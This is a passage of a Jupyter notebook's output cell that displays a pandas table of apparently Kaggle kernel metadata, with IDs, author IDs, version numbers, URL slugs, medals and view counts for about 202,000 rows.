" <tr>\n",
" <th>9</th>\n",
" <td>13</td>\n",
" <td>993</td>\n",
" <td>6468.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>73.0</td>\n",
" <td>0.0</td>\n",
" <td>installed-packages</td>\n",
" <td>NaN</td>\n",
" <td>6</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>10</th>\n",
" <td>14</td>\n",
" <td>993</td>\n",
" <td>269065.0</td>\n",
" <td>NaN</td>\n",
" <td>14925.0</td>\n",
" <td>77.0</td>\n",
" <td>0.0</td>\n",
" <td>installed-r-packages</td>\n",
" <td>NaN</td>\n",
" <td>7921</td>\n",
" <td>2</td>\n",
" <td>6</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>11</th>\n",
" <td>15</td>\n",
" <td>993</td>\n",
" <td>520.0</td>\n",
" <td>NaN</td>\n",
" <td>20068.0</td>\n",
" <td>140.0</td>\n",
" <td>0.0</td>\n",
" <td>example-handwritten-digits</td>\n",
" <td>3.0</td>\n",
" <td>29080</td>\n",
" <td>8</td>\n",
" <td>36</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>12</th>\n",
" <td>16</td>\n",
" <td>993</td>\n",
" <td>154.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>141.0</td>\n",
" <td>0.0</td>\n",
" <td>mean-digits</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>13</th>\n",
" <td>17</td>\n",
" <td>993</td>\n",
" <td>649.0</td>\n",
" <td>NaN</td>\n",
" <td>18337.0</td>\n",
" <td>155.0</td>\n",
" <td>0.0</td>\n",
" <td>pixel-mean-and-variances-by-digit</td>\n",
" <td>NaN</td>\n",
" <td>9989</td>\n",
" <td>5</td>\n",
" <td>8</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>14</th>\n",
" <td>20</td>\n",
" <td>993</td>\n",
" <td>803.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>171.0</td>\n",
" <td>0.0</td>\n",
" <td>random-forest-benchmark-tree-4</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>15</th>\n",
" <td>21</td>\n",
" <td>993</td>\n",
" <td>1227.0</td>\n",
" <td>NaN</td>\n",
" <td>17462.0</td>\n",
" <td>185.0</td>\n",
" <td>0.0</td>\n",
" <td>random-forest-benchmark-1</td>\n",
" <td>2.0</td>\n",
" <td>52294</td>\n",
" <td>23</td>\n",
" <td>91</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>16</th>\n",
" <td>22</td>\n",
" <td>206545</td>\n",
" <td>190.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>188.0</td>\n",
" <td>0.0</td>\n",
" <td>dougg-test</td>\n",
" <td>NaN</td>\n",
" <td>164</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>17</th>\n",
" <td>23</td>\n",
" <td>114978</td>\n",
" <td>193.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>191.0</td>\n",
" <td>0.0</td>\n",
" <td>some-basic-stats</td>\n",
" <td>NaN</td>\n",
" <td>230</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>18</th>\n",
" <td>24</td>\n",
" <td>114978</td>\n",
" <td>308.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>194.0</td>\n",
" <td>0.0</td>\n",
" <td>rotate-all-the-features</td>\n",
" <td>NaN</td>\n",
" <td>2491</td>\n",
" <td>0</td>\n",
" <td>4</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>19</th>\n",
" <td>25</td>\n",
" <td>993</td>\n",
" <td>213.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>209.0</td>\n",
" <td>0.0</td>\n",
" <td>running-system-commands</td>\n",
" <td>NaN</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>20</th>\n",
" <td>26</td>\n",
" <td>993</td>\n",
" <td>212.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>212.0</td>\n",
" <td>0.0</td>\n",
" <td>running-system-commands-1</td>\n",
" <td>NaN</td>\n",
" <td>84</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>21</th>\n",
" <td>27</td>\n",
" <td>993</td>\n",
" <td>294.0</td>\n",
" <td>NaN</td>\n",
" <td>35477.0</td>\n",
" <td>214.0</td>\n",
" <td>0.0</td>\n",
" <td>we-have-imagemagick-installed</td>\n",
" <td>NaN</td>\n",
" <td>685</td>\n",
" <td>1</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>22</th>\n",
" <td>29</td>\n",
" <td>114978</td>\n",
" <td>238.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>216.0</td>\n",
" <td>0.0</td>\n",
" <td>randombananaclassifier</td>\n",
" <td>NaN</td>\n",
" <td>766</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>23</th>\n",
" <td>30</td>\n",
" <td>9679</td>\n",
" <td>236.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>236.0</td>\n",
" <td>0.0</td>\n",
" <td>mytest</td>\n",
" <td>NaN</td>\n",
" <td>124</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>24</th>\n",
" <td>31</td>\n",
" <td>185835</td>\n",
" <td>261.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>239.0</td>\n",
" <td>0.0</td>\n",
" <td>peek-data</td>\n",
" <td>NaN</td>\n",
" <td>1064</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>25</th>\n",
" <td>32</td>\n",
" <td>19605</td>\n",
" <td>244.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>244.0</td>\n",
" <td>0.0</td>\n",
" <td>example-r</td>\n",
" <td>NaN</td>\n",
" <td>337</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>26</th>\n",
" <td>33</td>\n",
" <td>319768</td>\n",
" <td>253.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>253.0</td>\n",
" <td>0.0</td>\n",
" <td>testo</td>\n",
" <td>NaN</td>\n",
" <td>58</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>27</th>\n",
" <td>34</td>\n",
" <td>28963</td>\n",
" <td>19064.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>262.0</td>\n",
" <td>0.0</td>\n",
" <td>python</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>28</th>\n",
" <td>35</td>\n",
" <td>320040</td>\n",
" <td>264.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>263.0</td>\n",
" <td>0.0</td>\n",
" <td>digit-recognizer</td>\n",
" <td>NaN</td>\n",
" <td>142</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>29</th>\n",
" <td>39</td>\n",
" <td>319893</td>\n",
" <td>552.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>321.0</td>\n",
" <td>0.0</td>\n",
" <td>digit-recognizer-using-knn</td>\n",
" <td>NaN</td>\n",
" <td>717</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>...</th>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201951</th>\n",
" <td>1875333</td>\n",
" <td>442623</td>\n",
" <td>6498125.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6495275.0</td>\n",
" <td>0.0</td>\n",
" <td>project-euler-21</td>\n",
" <td>NaN</td>\n",
" <td>18</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201952</th>\n",
" <td>1875398</td>\n",
" <td>1497793</td>\n",
" <td>6497141.0</td>\n",
" <td>2395222.0</td>\n",
" <td>NaN</td>\n",
" <td>6497049.0</td>\n",
" <td>0.0</td>\n",
" <td>ny-stock-price-prediction-rnn-lstm-gru-eb2000</td>\n",
" <td>NaN</td>\n",
" <td>37</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201953</th>\n",
" <td>1875414</td>\n",
" <td>2080166</td>\n",
" <td>6494175.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6494175.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-banknote-f2165545-1</td>\n",
" <td>NaN</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201954</th>\n",
" <td>1875417</td>\n",
" <td>1776773</td>\n",
" <td>6499806.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6498408.0</td>\n",
" <td>0.0</td>\n",
" <td>lightgbm-automated-feature-engineering-easy</td>\n",
" <td>NaN</td>\n",
" <td>57</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201955</th>\n",
" <td>1915910</td>\n",
" <td>498422</td>\n",
" <td>6657552.0</td>\n",
" <td>6528403.0</td>\n",
" <td>NaN</td>\n",
" <td>6655666.0</td>\n",
" <td>0.0</td>\n",
" <td>a3-demo-decision-trees</td>\n",
" <td>NaN</td>\n",
" <td>29</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201956</th>\n",
" <td>1915916</td>\n",
" <td>2080166</td>\n",
" <td>6655493.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6655493.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-twitter-worlds2018-0cb7d034-3</td>\n",
" <td>NaN</td>\n",
" <td>3</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201957</th>\n",
" <td>1915988</td>\n",
" <td>1660833</td>\n",
" <td>6656526.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6655878.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-twitter-worlds2018</td>\n",
" <td>NaN</td>\n",
" <td>39</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201958</th>\n",
" <td>1916035</td>\n",
" <td>1179427</td>\n",
" <td>6661990.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6661990.0</td>\n",
" <td>0.0</td>\n",
" <td>tutorial-linear-regression</td>\n",
" <td>NaN</td>\n",
" <td>22</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201959</th>\n",
" <td>1916052</td>\n",
" <td>1828058</td>\n",
" <td>6730922.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6656151.0</td>\n",
" <td>0.0</td>\n",
" <td>mks-proteins</td>\n",
" <td>NaN</td>\n",
" <td>208</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201960</th>\n",
" <td>1916057</td>\n",
" <td>1601569</td>\n",
" <td>6730437.0</td>\n",
" <td>6633328.0</td>\n",
" <td>NaN</td>\n",
" <td>6668207.0</td>\n",
" <td>0.0</td>\n",
" <td>exploration-of-f1-dataset-1102f3-aaf5b9</td>\n",
" <td>NaN</td>\n",
" <td>41</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201961</th>\n",
" <td>1916068</td>\n",
" <td>1267737</td>\n",
" <td>6656222.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6656222.0</td>\n",
" <td>0.0</td>\n",
" <td>fraud-detection</td>\n",
" <td>NaN</td>\n",
" <td>17</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201962</th>\n",
" <td>1916091</td>\n",
" <td>756325</td>\n",
" <td>6656455.0</td>\n",
" <td>NaN</td>\n",
" <td>69117.0</td>\n",
" <td>6656455.0</td>\n",
" <td>0.0</td>\n",
" <td>google-customer-revenue-prediction</td>\n",
" <td>NaN</td>\n",
" <td>239</td>\n",
" <td>3</td>\n",
" <td>3</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201963</th>\n",
" <td>1916101</td>\n",
" <td>1090244</td>\n",
" <td>6690675.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6656399.0</td>\n",
" <td>0.0</td>\n",
" <td>diabeticretinopathyvgg16-finetuning</td>\n",
" <td>NaN</td>\n",
" <td>144</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201964</th>\n",
" <td>1916124</td>\n",
" <td>1170777</td>\n",
" <td>6805081.0</td>\n",
" <td>6632919.0</td>\n",
" <td>NaN</td>\n",
" <td>6805081.0</td>\n",
" <td>0.0</td>\n",
" <td>protein-atlas-exploration-and-baseline</td>\n",
" <td>NaN</td>\n",
" <td>17</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201965</th>\n",
" <td>1916181</td>\n",
" <td>2386017</td>\n",
" <td>6660035.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6659703.0</td>\n",
" <td>0.0</td>\n",
" <td>01-iris-species</td>\n",
" <td>NaN</td>\n",
" <td>36</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201966</th>\n",
" <td>1916199</td>\n",
" <td>2108937</td>\n",
" <td>6938214.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6657733.0</td>\n",
" <td>0.0</td>\n",
" <td>chicago-crime-investigation</td>\n",
" <td>NaN</td>\n",
" <td>71</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201967</th>\n",
" <td>1916215</td>\n",
" <td>637434</td>\n",
" <td>6904698.0</td>\n",
" <td>6600035.0</td>\n",
" <td>69362.0</td>\n",
" <td>6657640.0</td>\n",
" <td>0.0</td>\n",
" <td>cnn-128x128x4-keras-from-scratch-lb-0-328</td>\n",
" <td>2.0</td>\n",
" <td>1808</td>\n",
" <td>15</td>\n",
" <td>36</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201968</th>\n",
" <td>1916243</td>\n",
" <td>885589</td>\n",
" <td>6895750.0</td>\n",
" <td>6601958.0</td>\n",
" <td>NaN</td>\n",
" <td>6656920.0</td>\n",
" <td>0.0</td>\n",
" <td>transforma-o-de-vari-veis</td>\n",
" <td>NaN</td>\n",
" <td>117</td>\n",
" <td>0</td>\n",
" <td>13</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201969</th>\n",
" <td>1916268</td>\n",
" <td>1113072</td>\n",
" <td>6941531.0</td>\n",
" <td>NaN</td>\n",
" <td>69337.0</td>\n",
" <td>6658725.0</td>\n",
" <td>0.0</td>\n",
" <td>apply-t-sne-on-news</td>\n",
" <td>3.0</td>\n",
" <td>907</td>\n",
" <td>7</td>\n",
" <td>15</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201970</th>\n",
" <td>1916283</td>\n",
" <td>885589</td>\n",
" <td>6684908.0</td>\n",
" <td>6601958.0</td>\n",
" <td>NaN</td>\n",
" <td>6657006.0</td>\n",
" <td>0.0</td>\n",
" <td>redu-o-de-dimensionalidade</td>\n",
" <td>NaN</td>\n",
" <td>43</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201971</th>\n",
" <td>1916285</td>\n",
" <td>885589</td>\n",
" <td>6681010.0</td>\n",
" <td>6601958.0</td>\n",
" <td>NaN</td>\n",
" <td>6657012.0</td>\n",
" <td>0.0</td>\n",
" <td>clusteriza-o</td>\n",
" <td>NaN</td>\n",
" <td>33</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201972</th>\n",
" <td>1916310</td>\n",
" <td>2080166</td>\n",
" <td>6657002.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6657002.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-twitter-data-4e7ab639-b</td>\n",
" <td>NaN</td>\n",
" <td>2</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201973</th>\n",
" <td>1916350</td>\n",
" <td>2092403</td>\n",
" <td>6671885.0</td>\n",
" <td>NaN</td>\n",
" <td>69316.0</td>\n",
" <td>6659016.0</td>\n",
" <td>0.0</td>\n",
" <td>how-to-score-0-0255-0-0245-top-10-score</td>\n",
" <td>NaN</td>\n",
" <td>552</td>\n",
" <td>2</td>\n",
" <td>10</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201974</th>\n",
" <td>1916366</td>\n",
" <td>2225268</td>\n",
" <td>6670628.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6657409.0</td>\n",
" <td>0.0</td>\n",
" <td>house-price-xgboost</td>\n",
" <td>NaN</td>\n",
" <td>11</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201975</th>\n",
" <td>1916461</td>\n",
" <td>2080166</td>\n",
" <td>6657685.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6657685.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-twitter-sentiment-analysis-f08e9d52-d</td>\n",
" <td>NaN</td>\n",
" <td>4</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201976</th>\n",
" <td>1916539</td>\n",
" <td>1162757</td>\n",
" <td>6659497.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6659320.0</td>\n",
" <td>0.0</td>\n",
" <td>mnist-with-fastai-style</td>\n",
" <td>NaN</td>\n",
" <td>6</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201977</th>\n",
" <td>1916566</td>\n",
" <td>1270421</td>\n",
" <td>6658657.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6658657.0</td>\n",
" <td>0.0</td>\n",
" <td>a-begining-try</td>\n",
" <td>NaN</td>\n",
" <td>31</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201978</th>\n",
" <td>1916572</td>\n",
" <td>2373215</td>\n",
" <td>6658820.0</td>\n",
" <td>1847749.0</td>\n",
" <td>NaN</td>\n",
" <td>6658820.0</td>\n",
" <td>0.0</td>\n",
" <td>getting-started-in-r-first-steps-337898</td>\n",
" <td>NaN</td>\n",
" <td>4</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201979</th>\n",
" <td>1916595</td>\n",
" <td>2355967</td>\n",
" <td>6658417.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6658388.0</td>\n",
" <td>0.0</td>\n",
" <td>my-first-data-science-homework</td>\n",
" <td>NaN</td>\n",
" <td>70</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201980</th>\n",
" <td>1916605</td>\n",
" <td>1977282</td>\n",
" <td>6818544.0</td>\n",
" <td>NaN</td>\n",
" <td>69150.0</td>\n",
" <td>6660859.0</td>\n",
" <td>0.0</td>\n",
" <td>u-s-democrat-and-republican-tweet-exploration</td>\n",
" <td>NaN</td>\n",
" <td>82</td>\n",
" <td>2</td>\n",
" <td>4</td>\n",
" <td>1</td>\n",
" </tr>\n",
" </tbody>\n",
"</table>\n",
"<p>201981 rows × 13 columns</p>\n",
"</div>"
],
"text/plain": [
" Id AuthorUserId CurrentKernelVersionId \\\n",
"0 1 2505 205.0 \n",
"1 2 3716 1748.0 \n",
"2 4 3716 41.0 \n",
"3 5 28963 19.0 \n",
"4 6 3716 21.0 \n",
"5 7 3716 48.0 \n",
"6 9 3716 50.0 \n",
"7 11 3716 373.0 \n",
"8 12 993 6467.0 \n",
"9 13 993 6468.0 \n",
"10 14 993 269065.0 \n",
"11 15 993 520.0 \n",
"12 16 993 154.0 \n",
"13 17 993 649.0 \n",
"14 20 993 803.0 \n",
"15 21 993 1227.0 \n",
"16 22 206545 190.0 \n",
"17 23 114978 193.0 \n",
"18 24 114978 308.0 \n",
"19 25 993 213.0 \n",
"20 26 993 212.0 \n",
"21 27 993 294.0 \n",
"22 29 114978 238.0 \n",
"23 30 9679 236.0 \n",
"24 31 185835 261.0 \n",
"25 32 19605 244.0 \n",
"26 33 319768 253.0 \n",
"27 34 28963 19064.0 \n",
"28 35 320040 264.0 \n",
"29 39 319893 552.0 \n",
"... ... ... ... \n",
"201951 1875333 442623 6498125.0 \n",
"201952 1875398 1497793 6497141.0 \n",
"201953 1875414 2080166 6494175.0 \n",
"201954 1875417 1776773 6499806.0 \n",
"201955 1915910 498422 6657552.0 \n",
"201956 1915916 2080166 6655493.0 \n",
"201957 1915988 1660833 6656526.0 \n",
"201958 1916035 1179427 6661990.0 \n",
"201959 1916052 1828058 6730922.0 \n",
"201960 1916057 1601569 6730437.0 \n",
"201961 1916068 1267737 6656222.0 \n",
"201962 1916091 756325 6656455.0 \n",
"201963 1916101 1090244 6690675.0 \n",
"201964 1916124 1170777 6805081.0 \n",
"201965 1916181 2386017 6660035.0 \n",
"201966 1916199 2108937 6938214.0 \n",
"201967 1916215 637434 6904698.0 \n",
"201968 1916243 885589 6895750.0 \n",
"201969 1916268 1113072 6941531.0 \n",
"201970 1916283 885589 6684908.0 \n",
"201971 1916285 885589 6681010.0 \n",
"201972 1916310 2080166 6657002.0 \n",
"201973 1916350 2092403 6671885.0 \n",
"201974 1916366 2225268 6670628.0 \n",
"201975 1916461 2080166 6657685.0 \n",
"201976 1916539 1162757 6659497.0 \n",
"201977 1916566 1270421 6658657.0 \n",
"201978 1916572 2373215 6658820.0 \n",
"201979 1916595 2355967 6658417.0 \n",
"201980 1916605 1977282 6818544.0 \n",
"\n",
" ForkParentKernelVersionId ForumTopicId FirstKernelVersionId \\\n",
"0 NaN NaN 1.0 \n",
"1 NaN 26670.0 2.0 \n",
"2 NaN NaN 9.0 \n",
"3 NaN NaN 13.0 \n",
"4 NaN NaN 15.0 \n",
"5 NaN NaN 27.0 \n",
"6 NaN NaN 49.0 \n",
"7 NaN NaN 54.0 \n",
"8 NaN NaN 55.0 \n",
"9 NaN NaN 73.0 \n",
"10 NaN 14925.0 77.0 \n",
"11 NaN 20068.0 140.0 \n",
"12 NaN NaN 141.0 \n",
"13 NaN 18337.0 155.0 \n",
"14 NaN NaN 171.0 \n",
"15 NaN 17462.0 185.0 \n",
"16 NaN NaN 188.0 \n",
"17 NaN NaN 191.0 \n",
"18 NaN NaN 194.0 \n",
"19 NaN NaN 209.0 \n",
"20 NaN NaN 212.0 \n",
"21 NaN 35477.0 214.0 \n",
"22 NaN NaN 216.0 \n",
"23 NaN NaN 236.0 \n",
"24 NaN NaN 239.0 \n",
"25 NaN NaN 244.0 \n",
"26 NaN NaN 253.0 \n",
"27 NaN NaN 262.0 \n",
"28 NaN NaN 263.0 \n",
"29 NaN NaN 321.0 \n",
"... ... ... ... \n",
"201951 NaN NaN 6495275.0 \n",
"201952 2395222.0 NaN 6497049.0 \n",
"201953 NaN NaN 6494175.0 \n",
"201954 NaN NaN 6498408.0 \n",
"201955 6528403.0 NaN 6655666.0 \n",
"201956 NaN NaN 6655493.0 \n",
"201957 NaN NaN 6655878.0 \n",
"201958 NaN NaN 6661990.0 \n",
"201959 NaN NaN 6656151.0 \n",
"201960 6633328.0 NaN 6668207.0 \n",
"201961 NaN NaN 6656222.0 \n",
"201962 NaN 69117.0 6656455.0 \n",
"201963 NaN NaN 6656399.0 \n",
"201964 6632919.0 NaN 6805081.0 \n",
"201965 NaN NaN 6659703.0 \n",
"201966 NaN NaN 6657733.0 \n",
"201967 6600035.0 69362.0 6657640.0 \n",
"201968 6601958.0 NaN 6656920.0 \n",
"201969 NaN 69337.0 6658725.0 \n",
"201970 6601958.0 NaN 6657006.0 \n",
"201971 6601958.0 NaN 6657012.0 \n",
"201972 NaN NaN 6657002.0 \n",
"201973 NaN 69316.0 6659016.0 \n",
"201974 NaN NaN 6657409.0 \n",
"201975 NaN NaN 6657685.0 \n",
"201976 NaN NaN 6659320.0 \n",
"201977 NaN NaN 6658657.0 \n",
"201978 1847749.0 NaN 6658820.0 \n",
"201979 NaN NaN 6658388.0 \n",
"201980 NaN 69150.0 6660859.0 \n",
"\n",
" IsProjectLanguageTemplate \\\n",
"0 0.0 \n",
"1 0.0 \n",
"2 0.0 \n",
"3 0.0 \n",
"4 0.0 \n",
"5 0.0 \n",
"6 0.0 \n",
"7 0.0 \n",
"8 0.0 \n",
"9 0.0 \n",
"10 0.0 \n",
"11 0.0 \n",
"12 0.0 \n",
"13 0.0 \n",
"14 0.0 \n",
"15 0.0 \n",
"16 0.0 \n",
"17 0.0 \n",
"18 0.0 \n",
"19 0.0 \n",
"20 0.0 \n",
"21 0.0 \n",
"22 0.0 \n",
"23 0.0 \n",
"24 0.0 \n",
"25 0.0 \n",
"26 0.0 \n",
"27 0.0 \n",
"28 0.0 \n",
"29 0.0 \n",
"... ... \n",
"201951 0.0 \n",
"201952 0.0 \n",
"201953 0.0 \n",
"201954 0.0 \n",
"201955 0.0 \n",
"201956 0.0 \n",
"201957 0.0 \n",
"201958 0.0 \n",
"201959 0.0 \n",
"201960 0.0 \n",
"201961 0.0 \n",
"201962 0.0 \n",
"201963 0.0 \n",
"201964 0.0 \n",
"201965 0.0 \n",
"201966 0.0 \n",
"201967 0.0 \n",
"201968 0.0 \n",
"201969 0.0 \n",
"201970 0.0 \n",
"201971 0.0 \n",
"201972 0.0 \n",
"201973 0.0 \n",
"201974 0.0 \n",
"201975 0.0 \n",
"201976 0.0 \n",
"201977 0.0 \n",
"201978 0.0 \n",
"201979 0.0 \n",
"201980 0.0 \n",
"\n",
" CurrentUrlSlug Medal TotalViews \\\n",
"0 hello NaN 24 \n",
"1 rf-proximity 3.0 7547 \n",
"2 r-version NaN 9 \n",
"3 test1 NaN 9 \n",
"4 are-icons-missing NaN 7 \n",
"5 testing-version-bolding NaN 13 \n",
"6 testing-version-bolding-with-new-script NaN 2 \n",
"7 as-raster NaN 2 \n",
"8 whoops-doing-this-logged-in-under-my-own-name NaN 6 \n",
"9 installed-packages NaN 6 \n",
"10 installed-r-packages NaN 7921 \n",
"11 example-handwritten-digits 3.0 29080 \n",
"12 mean-digits NaN 9 \n",
"13 pixel-mean-and-variances-by-digit NaN 9989 \n",
"14 random-forest-benchmark-tree-4 NaN 7 \n",
"15 random-forest-benchmark-1 2.0 52294 \n",
"16 dougg-test NaN 164 \n",
"17 some-basic-stats NaN 230 \n",
"18 rotate-all-the-features NaN 2491 \n",
"19 running-system-commands NaN 0 \n",
"20 running-system-commands-1 NaN 84 \n",
"21 we-have-imagemagick-installed NaN 685 \n",
"22 randombananaclassifier NaN 766 \n",
"23 mytest NaN 124 \n",
"24 peek-data NaN 1064 \n",
"25 example-r NaN 337 \n",
"26 testo NaN 58 \n",
"27 python NaN 7 \n",
"28 digit-recognizer NaN 142 \n",
"29 digit-recognizer-using-knn NaN 717 \n",
